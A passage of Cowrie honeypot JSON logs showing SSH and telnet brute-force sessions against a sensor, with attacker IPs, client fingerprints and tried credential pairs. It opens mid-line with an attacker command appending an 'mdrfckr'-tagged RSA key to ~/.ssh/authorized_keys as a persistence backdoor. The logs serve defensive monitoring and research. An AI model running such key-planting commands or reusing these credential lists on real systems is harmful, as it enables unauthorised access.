AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T02:17:05.361819Z","src_ip":"212.227.235.229","session":"8fa9e704acb4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T02:17:05.622430Z","src_ip":"212.227.235.229","session":"8fa9e704acb4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:17:05.623374Z","src_ip":"212.227.235.229","session":"8fa9e704acb4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43632,"dst_ip":"1.2.3.4","dst_port":22,"session":"6150037e6d89","protocol":"ssh","message":"New connection: 212.227.235.229:43632 (1.2.3.4:22) [session: 6150037e6d89]","sensor":"my-vps","timestamp":"2025-08-26T02:17:05.883248Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:17:05.884005Z","src_ip":"212.227.235.229","session":"6150037e6d89"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:17:06.143316Z","src_ip":"212.227.235.229","session":"6150037e6d89"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T02:17:07.229226Z","src_ip":"212.227.235.229","session":"6150037e6d89"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:17:08.491946Z","src_ip":"212.227.235.229","session":"6150037e6d89"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43648,"dst_ip":"1.2.3.4","dst_port":22,"session":"4aabf45449d9","protocol":"ssh","message":"New connection: 212.227.235.229:43648 (1.2.3.4:22) [session: 4aabf45449d9]","sensor":"my-vps","timestamp":"2025-08-26T02:17:08.770741Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:17:08.771727Z","src_ip":"212.227.235.229","session":"4aabf45449d9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:17:09.051904Z","src_ip":"212.227.235.229","session":"4aabf45449d9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:17:10.217019Z","src_ip":"212.227.235.229","session":"4aabf45449d9"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:17:10.497576Z","src_ip":"212.227.235.229","session":"8fa9e704acb4"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:17:10.498830Z","src_ip":"212.227.235.229","session":"4aabf45449d9"}
{"eventid":"cowrie.session.connect","src_ip":"220.123.64.235","src_port":38067,"dst_ip":"1.2.3.4","dst_port":23,"session":"31905db633fa","protocol":"telnet","message":"New connection: 220.123.64.235:38067 (1.2.3.4:23) [session: 31905db633fa]","sensor":"my-vps","timestamp":"2025-08-26T02:17:28.049317Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:17:46.109374Z","src_ip":"87.121.84.168","session":"1f9c35e8ba84"}
{"eventid":"cowrie.session.closed","duration":180.09486889839172,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:17:46.114410Z","src_ip":"87.121.84.168","session":"1f9c35e8ba84"}
{"eventid":"cowrie.session.closed","duration":31.36786675453186,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:17:59.417113Z","src_ip":"220.123.64.235","session":"31905db633fa"}
{"eventid":"cowrie.session.connect","src_ip":"93.123.109.181","src_port":56062,"dst_ip":"1.2.3.4","dst_port":22,"session":"d392b84440e1","protocol":"ssh","message":"New connection: 93.123.109.181:56062 (1.2.3.4:22) [session: d392b84440e1]","sensor":"my-vps","timestamp":"2025-08-26T02:18:09.674988Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T02:18:09.675971Z","src_ip":"93.123.109.181","session":"d392b84440e1"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T02:18:09.695389Z","src_ip":"93.123.109.181","session":"d392b84440e1"}
{"eventid":"cowrie.login.failed","username":"solv","password":"solv","message":"login attempt [solv/solv] failed","sensor":"my-vps","timestamp":"2025-08-26T02:18:09.754744Z","src_ip":"93.123.109.181","session":"d392b84440e1"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:18:10.776339Z","src_ip":"93.123.109.181","session":"d392b84440e1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41514,"dst_ip":"1.2.3.4","dst_port":23,"session":"e6a1ab21774f","protocol":"telnet","message":"New connection: 212.227.235.229:41514 (1.2.3.4:23) [session: e6a1ab21774f]","sensor":"my-vps","timestamp":"2025-08-26T02:18:17.071968Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:18:17.281918Z","src_ip":"212.227.235.229","session":"e6a1ab21774f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:18:17.345942Z","src_ip":"212.227.235.229","session":"e6a1ab21774f"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-26T02:18:17.347327Z","src_ip":"212.227.235.229","session":"e6a1ab21774f"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-26T02:18:17.348089Z","src_ip":"212.227.235.229","session":"e6a1ab21774f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36144,"dst_ip":"1.2.3.4","dst_port":22,"session":"915a852ce4a7","protocol":"ssh","message":"New connection: 212.227.235.229:36144 (1.2.3.4:22) [session: 915a852ce4a7]","sensor":"my-vps","timestamp":"2025-08-26T02:18:18.529436Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:18:18.530565Z","src_ip":"212.227.235.229","session":"915a852ce4a7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:18:18.810555Z","src_ip":"212.227.235.229","session":"915a852ce4a7"}
{"eventid":"cowrie.login.failed","username":"git","password":"git@123","message":"login attempt [git/git@123] failed","sensor":"my-vps","timestamp":"2025-08-26T02:18:19.971237Z","src_ip":"212.227.235.229","session":"915a852ce4a7"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:18:21.257717Z","src_ip":"212.227.235.229","session":"915a852ce4a7"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:18:23.246883Z","src_ip":"154.221.29.240","session":"e42de49d535f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33496,"dst_ip":"1.2.3.4","dst_port":23,"session":"30581f2d0077","protocol":"telnet","message":"New connection: 212.227.125.160:33496 (1.2.3.4:23) [session: 30581f2d0077]","sensor":"my-vps","timestamp":"2025-08-26T02:18:50.219718Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:18:50.305596Z","src_ip":"212.227.125.160","session":"30581f2d0077"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:18:50.322262Z","src_ip":"212.227.125.160","session":"30581f2d0077"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53268,"dst_ip":"1.2.3.4","dst_port":22,"session":"a31b13fbe844","protocol":"ssh","message":"New connection: 212.227.235.229:53268 (1.2.3.4:22) [session: a31b13fbe844]","sensor":"my-vps","timestamp":"2025-08-26T02:19:38.849372Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:19:38.850245Z","src_ip":"212.227.235.229","session":"a31b13fbe844"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:19:39.108505Z","src_ip":"212.227.235.229","session":"a31b13fbe844"}
{"eventid":"cowrie.login.failed","username":"ossuser","password":"12345","message":"login attempt [ossuser/12345] failed","sensor":"my-vps","timestamp":"2025-08-26T02:19:40.145412Z","src_ip":"212.227.235.229","session":"a31b13fbe844"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:19:41.407792Z","src_ip":"212.227.235.229","session":"a31b13fbe844"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51824,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab4cab91514b","protocol":"ssh","message":"New connection: 212.227.235.229:51824 (1.2.3.4:22) [session: ab4cab91514b]","sensor":"my-vps","timestamp":"2025-08-26T02:20:42.801626Z"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:20:43.728026Z","src_ip":"212.227.235.229","session":"ab4cab91514b"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":57264,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f14bc0d839b","protocol":"ssh","message":"New connection: 139.19.117.131:57264 (1.2.3.4:22) [session: 1f14bc0d839b]","sensor":"my-vps","timestamp":"2025-08-26T02:20:58.475186Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T02:20:58.475861Z","src_ip":"139.19.117.131","session":"1f14bc0d839b"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-26T02:20:58.492636Z","src_ip":"139.19.117.131","session":"1f14bc0d839b"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"3e:c5:05:b4:04:fb:f9:3e:74:a7:7c:19:1e:89:5f:f7","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuGpImNMYs18pI0vf9uo92skKKko1/CECMRjQFtPUvHompfX8mflBTEd1mJkMqYbSgNydIAigxnP4PeyTTAXUsmi9076bqeYTvdQ9SSrMXJsG4xJjyfhSxfbE6w9O90BxRt1/Mx2WIK1MHwlJ2t+lCdV/Mpw93wBJYdb8I8lvWz4punK7h1KYrVMGeqGFMUzUVz7zmpytbdOrSbt9KbbMUlgYXZdpfsFoL3fxswmXG51wxisjHw62nnxb76QjAHCBZhpkhbgqSz0EGKH6s4UihQ+Zo76CxA476TajadPrWqtT+N+aBzLukpoPKprR5+G48HTGBgyyDSQRC1ObOhkQj","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 3e:c5:05:b4:04:fb:f9:3e:74:a7:7c:19:1e:89:5f:f7","sensor":"my-vps","timestamp":"2025-08-26T02:20:58.529682Z","src_ip":"139.19.117.131","session":"1f14bc0d839b"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"3e:c5:05:b4:04:fb:f9:3e:74:a7:7c:19:1e:89:5f:f7","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuGpImNMYs18pI0vf9uo92skKKko1/CECMRjQFtPUvHompfX8mflBTEd1mJkMqYbSgNydIAigxnP4PeyTTAXUsmi9076bqeYTvdQ9SSrMXJsG4xJjyfhSxfbE6w9O90BxRt1/Mx2WIK1MHwlJ2t+lCdV/Mpw93wBJYdb8I8lvWz4punK7h1KYrVMGeqGFMUzUVz7zmpytbdOrSbt9KbbMUlgYXZdpfsFoL3fxswmXG51wxisjHw62nnxb76QjAHCBZhpkhbgqSz0EGKH6s4UihQ+Zo76CxA476TajadPrWqtT+N+aBzLukpoPKprR5+G48HTGBgyyDSQRC1ObOhkQj","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T02:20:58.530931Z","src_ip":"139.19.117.131","session":"1f14bc0d839b"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"3e:c5:05:b4:04:fb:f9:3e:74:a7:7c:19:1e:89:5f:f7","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuGpImNMYs18pI0vf9uo92skKKko1/CECMRjQFtPUvHompfX8mflBTEd1mJkMqYbSgNydIAigxnP4PeyTTAXUsmi9076bqeYTvdQ9SSrMXJsG4xJjyfhSxfbE6w9O90BxRt1/Mx2WIK1MHwlJ2t+lCdV/Mpw93wBJYdb8I8lvWz4punK7h1KYrVMGeqGFMUzUVz7zmpytbdOrSbt9KbbMUlgYXZdpfsFoL3fxswmXG51wxisjHw62nnxb76QjAHCBZhpkhbgqSz0EGKH6s4UihQ+Zo76CxA476TajadPrWqtT+N+aBzLukpoPKprR5+G48HTGBgyyDSQRC1ObOhkQj","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 3e:c5:05:b4:04:fb:f9:3e:74:a7:7c:19:1e:89:5f:f7","sensor":"my-vps","timestamp":"2025-08-26T02:20:58.548274Z","src_ip":"139.19.117.131","session":"1f14bc0d839b"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"3e:c5:05:b4:04:fb:f9:3e:74:a7:7c:19:1e:89:5f:f7","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuGpImNMYs18pI0vf9uo92skKKko1/CECMRjQFtPUvHompfX8mflBTEd1mJkMqYbSgNydIAigxnP4PeyTTAXUsmi9076bqeYTvdQ9SSrMXJsG4xJjyfhSxfbE6w9O90BxRt1/Mx2WIK1MHwlJ2t+lCdV/Mpw93wBJYdb8I8lvWz4punK7h1KYrVMGeqGFMUzUVz7zmpytbdOrSbt9KbbMUlgYXZdpfsFoL3fxswmXG51wxisjHw62nnxb76QjAHCBZhpkhbgqSz0EGKH6s4UihQ+Zo76CxA476TajadPrWqtT+N+aBzLukpoPKprR5+G48HTGBgyyDSQRC1ObOhkQj","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T02:20:58.548841Z","src_ip":"139.19.117.131","session":"1f14bc0d839b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56788,"dst_ip":"1.2.3.4","dst_port":22,"session":"76da99c9cb99","protocol":"ssh","message":"New connection: 212.227.235.229:56788 (1.2.3.4:22) [session: 76da99c9cb99]","sensor":"my-vps","timestamp":"2025-08-26T02:21:01.588970Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:21:01.590043Z","src_ip":"212.227.235.229","session":"76da99c9cb99"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nist